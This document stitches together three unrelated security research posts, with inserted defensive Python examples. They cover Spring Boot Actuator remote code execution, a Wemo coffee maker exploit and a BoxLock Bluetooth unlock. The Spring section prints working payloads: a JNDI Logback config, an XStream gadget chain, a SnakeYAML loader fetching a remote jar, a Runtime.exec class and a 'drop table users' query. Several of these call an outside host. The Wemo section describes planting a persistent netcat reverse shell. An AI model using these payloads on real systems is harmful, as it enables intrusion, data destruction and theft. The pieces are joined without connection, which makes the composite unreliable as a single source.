When a Spring Boot application is running, it automatically registers several endpoints (such as '/health', '/trace', '/beans', '/env', etc.) into the routing process. For Spring Boot 1 to 1.4, they are accessible without authentication, causing significant security problems. Starting with Spring Boot 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers.

The following Actuator endpoints could potentially have security implications leading to possible vulnerabilities:

  • /dump - displays a dump of threads (including a stack trace)
  • /trace - displays the last several HTTP messages (which could include session identifiers)
  • /logfile - outputs the contents of the log file
  • /shutdown - shuts the application down
  • /mappings - shows all of the MVC controller mappings
  • /env - provides access to the configuration environment
  • /restart - restarts the application

For Spring Boot 1.x, they are registered under the root URL; in 2.x they moved to the "/actuator/" base path.

Exploitation:

Most of the actuators support only GET requests and simply reveal sensitive configuration data, but several of them are particularly interesting for shell hunters:

1. Remote Code Execution via '/jolokia'

If the Jolokia Library is in the target application classpath, it is automatically exposed by Spring Boot under the '/jolokia' actuator endpoint. Jolokia allows HTTP access to all registered MBeans and is designed to perform the same operations you can perform with JMX. It is possible to list all available MBeans actions using the URL:

http://127.0.0.1:8090/jolokia/list

Again, most of the MBeans actions just reveal some system data, but one is particularly interesting:

The 'reloadByURL' action, provided by the Logback library, allows us to reload the logging config from an external URL. It could be triggered just by navigating to:

So, why should we care about logging config? Mainly because of two things:

  1. Config has an XML format, and of course, Logback parses it with External Entities enabled, hence it is vulnerable to blind XXE.
  2. The Logback config has the feature 'Obtaining variables from JNDI'. In the XML file, we can include a tag like '<insertFromJNDI env-entry-name="java:comp/env/appName" as="appName" />' and the name attribute will be passed to the DirContext.lookup() method. If we can supply an arbitrary name into the .lookup() function, we don't even need XXE or HeapDump because it gives us a full Remote Code Execution.

How it works:

1. An attacker requests the aforementioned URL to execute the 'reloadByURL' function, provided by the 'qos.logback.classic.jmx.JMXConfigurator' class.

2. The 'reloadByURL' function downloads a new config from http://artsploit.com/logback.xml and parses it as a Logback config. This malicious config should have the following content:

<configuration>
  <insertFromJNDI env-entry-name="ldap://artsploit.com:1389/jndi" as="appName" />
</configuration>

3. When this file is parsed on the vulnerable server, it creates a connection to the attacker-controlled LDAP server specified in the “env-entry-name” parameter value, which leads to JNDI resolution. The malicious LDAP server may return an object with 'Reference' type to trigger an execution of the supplied bytecode on the target application. JNDI attacks are well explained in this MicroFocus research paper. The new JNDI exploitation technique (described previously in our blog) also works here, as Tomcat is the default application server in the Spring Boot Framework.

2. Config modification via '/env'

If Spring Cloud libraries are in the classpath, the '/env' endpoint allows you to modify the Spring environment properties. All beans annotated with '@ConfigurationProperties' may be modified and rebound. Many, but not all, of the properties we can control are listed on the '/configprops' actuator endpoint. Actually, there are tons of them, but it is not at all clear what needs to be modified to achieve something. After spending a couple of days playing with them, we found this:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
 
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

This property modifies the Eureka serviceURL to an arbitrary value. Eureka Server is normally used as a discovery server, and almost all Spring Cloud applications register at it and send status updates to it. If you are lucky enough to have Eureka-Client <1.8.7 in the target classpath (it is normally included in Spring Cloud Netflix), you can exploit the XStream deserialization vulnerability in it. All you need to do is set the 'eureka.client.serviceUrl.defaultZone' property to your server URL (http://artsploit.com/n/xstream) via '/env' and then call the '/refresh' endpoint. After that, your server should serve the XStream payload with the following content:

<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                      <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>

This XStream payload is a slightly modified version of the ImageIO JDK-only gadget chain from the Marshalsec research. The only difference here is using LinkedHashSet to trigger the 'jdk.nashorn.internal.objects.NativeString.hashCode()' method. The original payload leverages java.lang.Map to achieve the same behaviour, but Eureka's XStream configuration has a custom converter for maps which makes it unusable. The payload above does not use Maps at all and can be used to achieve Remote Code Execution without additional constraints.

Using Spring Actuators, you can actually exploit this vulnerability even if you don't have access to an internal Eureka server; you only need an "/env" endpoint available.

Other useful settings:

spring.datasource.tomcat.validationQuery=drop+table+users - allows you to specify any SQL query, and it will be automatically executed against the current database. It could be any statement, including insert, update, or delete.

spring.datasource.tomcat.url=jdbc:hsqldb:https://localhost:3002/xdb - allows you to modify the current JDBC connection string.

The last one looks great, but the problem is that by the time the application is running, the database connection is already established, so just updating the JDBC string does not have any effect. Fortunately, there is another property that may help us in this case:

spring.datasource.tomcat.max-active=777

The trick we can use here is to increase the number of simultaneous connections to the database. So, we can change the JDBC connection string, increase the number of connections, and after that send many requests to the application to simulate heavy load. Under the load, the application will create a new database connection with the updated malicious JDBC string. I tested this technique locally against MySQL and it works like a charm.

Apart from that, there are other properties that look interesting, but, in practice, are not really useful:

spring.datasource.url - database connection string (used only for the first connection)

spring.datasource.jndiName - database JNDI name (used only for the first connection)

spring.datasource.tomcat.dataSourceJNDI - database JNDI name (not used at all)

spring.cloud.config.uri=http://artsploit.com/ - Spring Cloud Config URL (does not have any effect after app start; only the initial values are used.)

These properties do not have any effect unless the '/restart' endpoint is called. This endpoint restarts the whole ApplicationContext, but it is disabled by default.

There are a lot of other interesting properties, but most of them do not take immediate effect after change.

N.B. In Spring Boot 2.x, the request format for modifying properties via the '/env' endpoint is slightly different (it uses JSON instead), but the idea is the same.

An example of the vulnerable app:

If you want to test this vulnerability locally, I created a simple Spring Boot application on my GitHub page. All payloads should work there, except for the database settings (unless you configure them).

Black box discovery:

A full list of default actuators may be found here: https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt. Keep in mind that application developers can create their own endpoints using @Endpoint annotation.

Update May 2019:

There is a more reliable way to achieve RCE via a Spring environmental properties modification:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
 
spring.cloud.bootstrap.location=http://artsploit.com/yaml-payload.yml

This request modifies the 'spring.cloud.bootstrap.location' property, which is used to load external config and parse it in YAML format. To make this happen, we also need to call the '/refresh' endpoint.

POST /refresh HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

When the YAML config is fetched from the remote server, it is parsed with the SnakeYAML library, which is also susceptible to deserialization attacks. The payload (yaml-payload.yml) may be generated by using the aforementioned Marshalsec research:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]

Deserialization of this file triggers execution of the ScriptEngineManager's constructor with the supplied URLClassLoader. In a nutshell, it leads to the 'java.util.ServiceLoader#load(java.lang.Class<S>, java.lang.ClassLoader)' method, which tries to find all implementations of the 'ScriptEngineFactory' interface within all libraries in the classpath. Since we can add a new library via URLClassLoader, we can serve a new 'ScriptEngineFactory' with the malicious bytecode inside. In order to do so, we need to create a jar archive with the following mandatory files:

yaml-payload.jar:/artsploit/AwesomeScriptEngineFactory.class should contain the actual bytecode, with the malicious payload in the constructor.

import java.io.IOException;
import javax.script.ScriptEngineFactory;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
 
    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // The remaining ScriptEngineFactory interface methods are omitted in the post.
}

yaml-payload.jar:/META-INF/services/javax.script.ScriptEngineFactory should be just a text file containing a full reference to 'artsploit.AwesomeScriptEngineFactory', so that the ServiceLoader will know where to find the class:

artsploit.AwesomeScriptEngineFactory

Again, this exploitation technique requires Spring Cloud to be in the classpath, but in comparison to Eureka's XStream payload, it works even in the latest version. You can find the complete payload in my GitHub project: yaml-payload.
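From the defender's side, the request sequences described in this post leave a recognisable trail in the application's access log. The following is an added example, not code from the post or from the Spring project: it classifies constructed access-log lines against the actuator paths named above (both the 1.x root-level and 2.x '/actuator/' forms) and flags a client that got a successful POST to '/env' followed by '/refresh'. The log lines, IPs and the Jolokia MBean/URL placeholders are all constructed.

```python
import re
from collections import namedtuple

# Constructed sample access-log lines (common log format); they are not real traffic.
# The MBean and remote URL in the Jolokia line are placeholders, not a working request.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Feb/2019:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.5 - - [27/Feb/2019:10:01:03 +0000] "GET /health HTTP/1.1" 200 64
10.0.0.9 - - [27/Feb/2019:10:02:11 +0000] "GET /env HTTP/1.1" 200 18422
10.0.0.9 - - [27/Feb/2019:10:02:15 +0000] "POST /env HTTP/1.1" 200 0
10.0.0.9 - - [27/Feb/2019:10:02:16 +0000] "POST /refresh HTTP/1.1" 200 12
10.0.0.9 - - [27/Feb/2019:10:03:40 +0000] "GET /jolokia/list HTTP/1.1" 200 40960
10.0.0.9 - - [27/Feb/2019:10:03:41 +0000] "GET /jolokia/exec/MBEAN_PLACEHOLDER/reloadByURL/REMOTE_URL_PLACEHOLDER HTTP/1.1" 200 90
10.0.0.7 - - [27/Feb/2019:10:04:00 +0000] "GET /actuator/trace HTTP/1.1" 401 0
10.0.0.7 - - [27/Feb/2019:10:04:05 +0000] "GET /actuator/heapdump HTTP/1.1" 200 52428800
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoints the post lists as sensitive. /health and /info are deliberately absent:
# Spring Boot 1.5+ treats them as non-sensitive, so they are noise rather than signal.
READ_SENSITIVE = {"dump", "trace", "logfile", "mappings", "env", "configprops",
                  "heapdump", "beans", "jolokia"}
STATE_CHANGING = {"shutdown", "restart", "refresh"}

Finding = namedtuple("Finding", "ip method path status severity reason")


def classify(method, path):
    """Return (severity, reason) for one request, or None if it is not actuator-related.
    Handles both the 1.x root-level paths and the 2.x /actuator/ prefix."""
    segments = [s for s in path.split("?", 1)[0].split("/") if s]
    if segments and segments[0] == "actuator":
        segments = segments[1:]
    if not segments:
        return None
    name = segments[0]
    if name == "env" and method == "POST":
        return "high", "property modification via POST /env"
    if name == "jolokia" and "reloadByURL" in path:
        return "high", "Logback reloadByURL invoked through /jolokia"
    if name in STATE_CHANGING:
        return "high", f"state-changing actuator /{name}"
    if name in READ_SENSITIVE:
        return "medium", f"read of sensitive actuator /{name}"
    return None


def scan(log_text):
    """Parse log lines and return one Finding per actuator-related request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify(m["method"], m["path"])
        if result:
            findings.append(Finding(m["ip"], m["method"], m["path"], int(m["status"]), *result))
    return findings


def env_refresh_chains(findings):
    """IPs that got a 200 on POST /env and later a 200 on /refresh: the sequence the post
    uses for both the Eureka XStream and the spring.cloud.bootstrap.location payloads."""
    by_ip = {}
    for f in findings:
        if f.status == 200:
            by_ip.setdefault(f.ip, []).append(f)
    chains = []
    for ip, fs in by_ip.items():
        env_at = [i for i, f in enumerate(fs) if f.reason.endswith("POST /env")]
        refresh_at = [i for i, f in enumerate(fs) if "/refresh" in f.reason]
        if env_at and refresh_at and min(env_at) < max(refresh_at):
            chains.append(ip)
    return chains


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f.severity:6} {f.ip:10} {f.method:4} {f.path}  ({f.reason})")
    print("POST /env -> /refresh chains from:", env_refresh_chains(results))
```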

Your Smart Coffee Maker is Brewing Up Trouble

IoT devices are notoriously insecure, and this claim can be backed up with a laundry list of examples. With more devices “needing” to connect to the internet, the possibility of your WiFi-enabled toaster getting hacked and tweeting out your credit card number is, amazingly, no longer a joke.

With that in mind, I began to investigate the Mr. Coffee Coffee Maker with Wemo (WeMo_WW_2.00.11058.PVT-OWRT-Smart) since we had previously bought one for our research lab (and we don’t have many coffee drinkers, so I didn’t feel bad about demolishing it!). My hope was to build on previous work done by my colleague Douglas McKee (@fulmetalpackets) and his Wemo Insight smart plug exploit. Finding a similar attack vector absent in this product, I explored a unique avenue and was able to find another vulnerability.  In this post I will explore my methodology and processes in detail.

All Wemo devices have two ways of communicating with the Wemo App, remotely via the internet or locally directly to the Wemo App. Remote connectivity is only present when the remote access setting is enabled, which it is by default. To allow the Wemo device to be controlled remotely, the Wemo checks Belkin’s servers periodically for updates. This way the Wemo doesn’t need to open any ports on your network. However, if you are trying to control your Wemo devices locally, or the remote access setting is disabled, the Wemo app connects directly to the Wemo. All my research is based on local device communication with the remote access setting turned off.

To gain insight on how the coffee maker communicates with its mobile application, I first set up a local network capture on my cellphone using an application called “SSL Capture.” SSL Capture allows the user to capture traffic from mobile applications. In this case, I selected the Wemo application. With the capture running, I went through the Wemo app and initiated several standard commands to generate network traffic. By doing this, I was able to view the communication between the coffee maker and the Wemo application. One of the unique characteristics about the app is that the user is able schedule the coffee maker to brew at a specified time. I made a few schedules and saved them.

I began analyzing the network traffic between the phone application and the Mr. Coffee machine. All transmissions between the two devices were issued in plaintext, meaning no encryption was used. I also noticed that the coffee maker and the mobile app were communicating over a protocol called UPNP (Universal Plug and Play), which has preset actions called “SOAP ACTIONS.” Digging deeper into the network capture from the device, I saw the SOAP action “SetRules.” This included XML content that pertained to the “brew schedule” I had set from the mobile application.

A Mr. Coffee “brew” being scheduled.

At this point I was able to see how the Wemo mobile application handled brewing schedules. Next, I wanted to see if the coffee maker performed any sort of validation of these schedules so I went back into the mobile application and disabled them all. I then copied the data and headers from the network capture and used the Linux Curl command to send the packet back to the coffee maker. I got the return header status of “200” which means “OK” in HTTP. This indicated there was no validation of the source of brewing schedules; I further verified with the mobile application and the newly scheduled brew appeared.

Curl command to send a “Brew” schedule to the Wemo Coffee maker.

Screenshot of the Curl command populating the Wemo app with a brew schedule

At this point I could change the coffee maker’s brew schedule without ever using the Wemo mobile application. To understand how the schedules were stored on the Wemo coffee maker, I decided to physically disassemble it and look at the electronics inside. Once disassembled, I saw there was a Wemo module connected to a larger PCB responsible for controlling the functions of the coffee maker. I then extracted the Wemo module from the coffee maker. This looked almost identical to the Wemo module that was in the Wemo Insight device. I leveraged Doug’s blog on exploitation of the Wemo Insight to replicate the serial identification, firmware extraction, and root password change. After I obtained root access via the serial port on the Wemo device, I began to investigate the way in which the Wemo application is initiated from the underlying Linux operating system. While looking through some of the most common Linux files and directories, I noticed something odd in the “crontab” file (used in Linux to execute and schedule commands).

It appeared the developers decided to take the easy route and used the Linux crontab file to schedule tasks instead of writing their own brew scheduling function. The crontab entry was the same as the scheduled brew I sent via the Wemo application (coffee-3) and executed as root. This was especially interesting; if I could add some sort of command to execute from the replayed UPNP packet, I could potentially execute my command as root over the network.

With the firmware dumped, I decided to look at the “rtng_run_rule” executable that was called in the crontab. The rtng_run_rule is a Lua script. As Lua is a scripting language, it was written in plaintext and not compiled like all the other Wemo executables. I followed the flow of execution until I noticed the rule passing parameters to a template for execution. At this point, I knew it would be useless trying to inject commands directly into the rule and instead looked at modifying the template performing the execution.

I went back to the Wemo mobile application network captures and started to dig around again. I found the application also sends the templates to the Wemo coffee maker. If I could figure out how to modify the template and still have the Wemo think it is valid, I could get arbitrary code execution.

Template with the correct syntax to pass Wemo’s verification

There were 3 templates sent over, “do,” “do_if,” and “do_unless.” Each of the templates were Lua scripts and encoded with base64. Based on this, I knew it would be trivial to insert my own code; the only remaining challenge would be the MD5 hash included at the top of the template. As it turned out, that was hardly an obstacle.

I created an MD5 hash of the base-64 decoded Lua script and the base64 encoded script separately, simply to see if one or the other matched the hash that was being sent; however, neither matched the MD5 being sent in the template. I began to think the developers used some sort of HMAC or clever way to hash the template, which would have made it much harder to upload a malicious template. Instead, I was astounded to find out that it was simply the base64 code prepended by the string “begin-base64 644 <template name>” and appended with the string “====.”

At last I had the ability to upload any template of my choice and have it pass all the Wemo’s verification steps necessary to be used by a scheduled rule.
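To show why that digest fails as an integrity control, here is an added example (not code from the post or from Belkin’s firmware): a verifier built the way the post describes the check, beside one keyed with a per-device secret. The device key, the exact line layout of the framing, and the Lua bodies are all constructed.

```python
import base64
import hashlib
import hmac

# Constructed per-device secret; a real design would provision one per unit at manufacture
# and never send it over the network.
DEVICE_KEY = b"constructed-per-device-secret-key"


def encode_template(lua_source):
    """Templates travel base64-encoded, as the post describes."""
    return base64.b64encode(lua_source.encode()).decode()


def frame(name, lua_b64):
    """The framing the post found around the body: a uuencode-style header line and a '====' trailer.
    The newline layout here is an assumption."""
    return f"begin-base64 644 {name}\n{lua_b64}\n====\n"


def weak_digest(name, lua_b64):
    """Unkeyed MD5 over public data: anyone who can send a template can also compute this."""
    return hashlib.md5(frame(name, lua_b64).encode()).hexdigest()


def weak_verify(name, lua_b64, digest):
    return hmac.compare_digest(weak_digest(name, lua_b64), digest)


def keyed_digest(key, name, lua_b64):
    """HMAC-SHA256 with a per-device secret: same framing, but only a key holder can produce it."""
    return hmac.new(key, frame(name, lua_b64).encode(), hashlib.sha256).hexdigest()


def keyed_verify(key, name, lua_b64, digest):
    return hmac.compare_digest(keyed_digest(key, name, lua_b64), digest)


# Constructed templates; the Lua is illustrative and not the firmware's real "do" template.
GENUINE = encode_template("-- constructed 'do' template\nrun_rule_action(rule)\n")
ALTERED = encode_template("-- altered template\nrun_rule_action(rule)\nextra_action()\n")


def tamper_check():
    """Compare how each scheme treats an altered template whose digest was recomputed."""
    genuine_weak = weak_digest("do", GENUINE)
    genuine_keyed = keyed_digest(DEVICE_KEY, "do", GENUINE)
    # The unkeyed digest can simply be recomputed for the altered body.
    recomputed_weak = weak_digest("do", ALTERED)
    # Without the key, the most a sender can do for the keyed scheme is reuse the genuine digest.
    return {
        "weak_accepts_genuine": weak_verify("do", GENUINE, genuine_weak),
        "weak_accepts_altered": weak_verify("do", ALTERED, recomputed_weak),
        "keyed_accepts_genuine": keyed_verify(DEVICE_KEY, "do", GENUINE, genuine_keyed),
        "keyed_rejects_altered": not keyed_verify(DEVICE_KEY, "do", ALTERED, genuine_keyed),
        "keyed_rejects_wrong_key": not keyed_verify(b"other-key", "do", GENUINE, genuine_keyed),
    }


if __name__ == "__main__":
    for check, ok in tamper_check().items():
        print(f"{check}: {ok}")
```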

I appended a new template called “hack” and added a block of code within the template to download and execute a shell script.

Within that shell command, I instructed the Mr. Coffee Coffee Maker with Wemo to download a cross-compiled version of Netcat so I could get a reverse shell, and also added an entry to “rc.local.” This was done so that if the coffee maker was power cycled, I would have persistent access to the device after reboot, via the Netcat reverse shell.

The final aspect of this exploit was to use what I learned earlier to schedule a brew with my new “hack” template executing my shell script. I took the schedule I was able to replay earlier and modified it to have the “hack” template execute 5 minutes from the time of sending. I did have to convert the time value required into the epoch time format.

Converting time to Epoch time.

Now, I sat back and waited as the coffee maker (at my specified time delay) connected to my computer, downloaded my shell script, and ran it. I verified that I had a reverse shell and that it ran as intended, perfectly.

This vulnerability does require network access to the same network the coffee maker is on. Depending on the complexity of the user’s password, WiFi cracking can be a relatively simple task to accomplish with today’s computing power. For example, we demonstrate a quick and easy brute force dictionary attack to crack a semi-complex WPA2 password (10 characters alpha-numeric) in the demo for the Wemo Insight smart plug.  However, even a slightly more complex password, employing special characters, would exponentially increase the difficulty of a brute force attack. We contacted Belkin (who owns Wemo) on November 16th, 2018 and disclosed this issue to them. While the vendor did not respond to this report, we were pleasantly surprised to see that the latest firmware update has patched the issue. Despite a general lack of communication, we’re delighted to see the results of our research further securing home automation devices.

This vulnerability shows that not all exploits are complicated or require an exceptional amount of effort to pull off, if you know what to look for. It exists solely because a few poor coding decisions were made in conjunction with a lack of input sanitization and validation. Even though this target holds no sensitive data and is only reachable from the local network, that does not mean malicious actors are not targeting IoT devices like this. They are attractive targets precisely because they are often overlooked from a security standpoint and can provide a simple, unmonitored foothold into a home or business network. Anyone buying a new IoT gadget should ask themselves: "Does this really need to be connected to the internet?" In the case of a coffee maker, I'll let you be the judge.

The post Your Smart Coffee Maker is Brewing Up Trouble appeared first on McAfee Blogs.

What’s in the Box?

2018 was another record-setting year in the continuing trend for consumer online shopping.  With an increase in technology and efficiency, and a decrease in cost and shipping time, consumers have clearly made a statement that shopping online is their preferred method.

Chart depicting growth of online, web-influenced and offline sales by year.1

In direct correlation with the growth of online shopping is the increase in home delivery and, correspondingly, package theft. Though my initial instinct was to attempt to recreate YouTuber Mark Rober's glitter bomb, I practiced restraint and instead settled on investigating an innovative product called the BoxLock (BoxLock firmware 94.50 or below). The BoxLock is a smart padlock that you can set up outside your house to secure a package delivery container. It can be opened either via the mobile application (Android or iOS) or by using the built-in barcode scanner to scan a package that is out for delivery. The intent is that delivery drivers use the BoxLock to unlock a secure drop box and place your package safely out of reach of package thieves. The homeowner can then unlock the lock from their phone using the app to retrieve their deliveries.

Since I am more of a hardware researcher, the first thing I did when I got the BoxLock was take it apart to view the internals.

With the device disassembled and the main PCB extracted, I began to look for interesting pins, mainly UART and JTAG connections. I found 5 pins below the WiFi module that I thought could be UART, but after running it through a logic analyzer I didn’t see anything that looked like communication.

The BoxLock uses a SOC (System-on-a-Chip) which contains the CPU, RAM, ROM, and flash memory all in one. However, there was still an additional flash chip which I thought was odd. I used my Exodus Intelligence hardware interface board to connect to the SPI flash chip and dump the contents.

Exodus Intelligence XI Hardware Interface Board

The flash chip was completely empty. My working theory is that this chip is used to store the barcodes of packages out for delivery. There could also have been an issue with my build of Flashrom, the software I used to dump the flash. The only reason I question my build of Flashrom is that I had to compile it myself with support for this exact flash chip (FT25H04S), since it is not supported by default.

The Main SOC (ATSAMD21J18)

Even though I couldn't get anything from that flash chip, my main target was the SOC. On the underside of the printed circuit board (PCB), I identified two Tag-Connect ports. I located the SWD (Serial Wire Debug) pins on the SOC (pins 57 and 58 in the image above) and very slowly and carefully traced the paths visually to the smaller Tag-Connect port.

 

Adafruit Feather M0 Development board

Since I had not done much JTAG or SWD work before, I grabbed an Adafruit Feather M0 that we had in our lab for practice, since the Feather uses the exact same SOC and WiFi chip as the BoxLock. Adafruit has excellent documentation on how to connect to the SOC via the SWD pins I had traced. I used Atmel Studio to read information off the ATSAMD21 SOC; this showed me how to read the fuses as well as dump the entire flash from the Adafruit Feather.

SWD information of the Adafruit Feather M0

Atmel Studio also tells you whether the device has the "Security Bit" enabled. When set, the security bit disables all external programming and debugging interfaces, making memory extraction and analysis extremely difficult. Once the security bit is set, the only way to clear it is a full chip erase, which also wipes the very flash contents you were hoping to read.

Showing how to set the security bit on the Adafruit Feather M0

After I felt comfortable with the Adafruit Feather, I connected the BoxLock to a Segger J-Link and loaded up Atmel Studio. The J-Link is a debug probe that supports both JTAG and SWD. I was pleasantly surprised to find that the developers had set the security bit; this is a protection often overlooked on IoT devices. With the goal of finding vulnerabilities, however, it was a roadblock, so I started to look elsewhere.

Segger JLink used for SWD communication

After spending some time under the microscope, I was able to trace back the larger Tag-Connect port to the BLE (Bluetooth Low Energy) module. The BLE module also has a full SOC which could be interesting to look at, but before I began investigating the BLE chip I still had two vectors to look at first: BLE and WiFi network traffic.

BLE is a different protocol from classic Bluetooth. Traffic between BLE devices can be encrypted, but how much protection that gives you depends on the pairing mode, and BLE offers several. The least secure mode, "Just Works", is what the BoxLock uses: it lets any device pair without the PIN or passkey that classic Bluetooth connections are known for, and it provides no protection against an active attacker. This means the link can be eavesdropped on and is susceptible to MITM (man-in-the-middle) attacks.

BLE roles are defined at the connection layer. GAP (Generic Access Profile) describes how devices discover and connect to each other. The two most important roles are Central and Peripheral. Low-power devices like the BoxLock take the Peripheral role and broadcast their presence (advertising). More capable devices, such as your phone, scan for advertising devices and connect to them (the Central role). Once connected, the two sides communicate through GATT (Generic Attribute Profile) services and their characteristics, each identified by a UUID. Some services are standardized by the Bluetooth SIG, for example the 16-bit UUID 0x180F is the Battery Service; standardized services let devices interoperate without custom protocols. The GATT services present on the BoxLock were all custom, which means they are displayed as "Unknown Service" when enumerated in a generic Bluetooth/BLE app. I chose Nordic's nRF Connect, available in both the Apple and Android app stores and as a desktop application.

NRF Connect application connected to the BoxLock via BLE

Since the BoxLock was using custom GATT services, I decided to pull apart the Android APK to see if I could find more information on the "Unknown" UUIDs. I used dex2jar to convert the APK's Dalvik bytecode into a jar and then ran the JavaScript code through JSBeautify to clean it up.

Next, I began searching for UUIDs and the keyword “GATT”. I was able to find the entire list of GATT services and what they pertain to.

GATT services UUID descriptions
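The two steps above, recognising which UUIDs are Bluetooth SIG standards and which are vendor-defined, and pulling the constants out of decompiled app code, are easy to automate. The following is an added example, not code from the original post or from BoxLock: it expands 16-bit SIG UUIDs onto the Bluetooth base UUID, classifies any UUID as standard or custom, and scrapes `UUID.fromString(...)` constants from a constructed snippet of decompiled Java. The custom UUIDs in the sample are made up for the example and are not the BoxLock's real values.

```python
import re

# Bluetooth SIG base UUID: a 16-bit assigned number XXXX is shorthand for
# 0000XXXX-0000-1000-8000-00805F9B34FB. Anything not on this base is vendor-defined.
BT_BASE_SUFFIX = "-0000-1000-8000-00805f9b34fb"

SIG_SERVICES = {  # subset of the SIG-assigned service UUIDs
    0x1800: "Generic Access",
    0x1801: "Generic Attribute",
    0x180A: "Device Information",
    0x180F: "Battery Service",
}

# Matches constants the way decompiled Android code declares them:
#   public static final UUID COMMAND_SERVICE = UUID.fromString("...");
CONST_RE = re.compile(r'(\w+)\s*=\s*UUID\.fromString\(\s*"([0-9a-fA-F-]{36})"\s*\)')


def expand_16bit(short):
    """Expand a 16-bit SIG UUID such as 0x180F to its 128-bit string form."""
    return "0000%04x%s" % (short, BT_BASE_SUFFIX)


def classify(uuid):
    """Name a known SIG service, flag an unlisted SIG-base UUID, or report 'custom'."""
    u = uuid.lower()
    if u.startswith("0000") and u.endswith(BT_BASE_SUFFIX):
        short = int(u[4:8], 16)
        return SIG_SERVICES.get(short, "SIG 0x%04X" % short)
    return "custom"


def find_uuids(source):
    """Map every UUID constant in decompiled source to (constant name, classification)."""
    return {uuid.lower(): (name, classify(uuid)) for name, uuid in CONST_RE.findall(source)}


# Constructed stand-in for decompiled app code. The two custom UUIDs are made
# up for this example; they are not the BoxLock's real values.
SAMPLE_DECOMPILED = '''
public static final UUID BATTERY_SERVICE = UUID.fromString("0000180F-0000-1000-8000-00805F9B34FB");
public static final UUID COMMAND_SERVICE = UUID.fromString("a1b2c3d4-0001-4000-8000-0123456789ab");
public static final UUID OPEN_SIGNAL_CHAR = UUID.fromString("a1b2c3d4-0002-4000-8000-0123456789ab");
'''

if __name__ == "__main__":
    for uuid, (name, kind) in find_uuids(SAMPLE_DECOMPILED).items():
        print("%-38s %-18s %s" % (uuid, name, kind))
```

Anything classified as "custom" is exactly what a generic BLE browser such as nRF Connect shows as "Unknown Service"; the constant names recovered from the app are what tell you which custom UUID is the command service worth probing.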

The one I was most interested in was labeled as “Command Service”, where the unlock GATT command is sent to. To try it out, I used the NRF Connect application to send a GATT “sendOpenSignal” command with an attribute value of “2”.

How the Android application sends the unlock command

It was just that simple; lo and behold, the BoxLock unlocked!

I was amazed; the phone that I used to send the GATT command over had never connected to the BoxLock before and did not have the BoxLock application installed, yet it was able to unlock the BoxLock. (The vulnerable application version is v1.25 and below).

Continuing to explore the other GATT UUIDs, I was able to read the WiFi SSID, access token, user’s email, and client ID directly off the device. I was also able to write any of these same values arbitrarily.

Information that you can see about the BoxLock via the NRF Connect application

The mandatory identifiers required for the BoxLock to unlock are the access token, user email, and client ID. If those values are not present the device will not authenticate via the cloud API and will not unlock.

The most glaring issue with having all these fields readable and writable is that I was able to read them off the device and replay them back to it, bypassing authentication entirely and unlocking the BoxLock.

From my testing, these values never expired and the only way I found that the device cleared the credentials necessary to authenticate was when I removed the battery from the BoxLock. The BoxLock battery is “technically” never supposed to be removed, but since I physically disassembled the lock, (which took a decent amount of effort), I was able to test this.

Even though I was able to unlock the BoxLock, I still wanted to explore one other common attack vector.  I analyzed the network traffic between the device and the internet. I quickly noticed that, apart from firmware updates, device-to-cloud traffic was properly secured with HTTPS and I could not easily get useful information from this vector.

I do not currently have an estimate of the extent of this product’s deployment, so I cannot comment on how wide the potential impact could have been if this issue had been found by a malicious party. One constraint to the attack vector is that it requires BLE, which communicates from a distance of approximately 30 or 40 feet. However, for someone looking to steal packages this would not be a challenge difficult to overcome, as the unlocking attack could be completed very quickly and easily, making the bar for exploitation simply a smart phone with Bluetooth capability. The ease and speed of the exploit could have made for an enticing target for criminals.

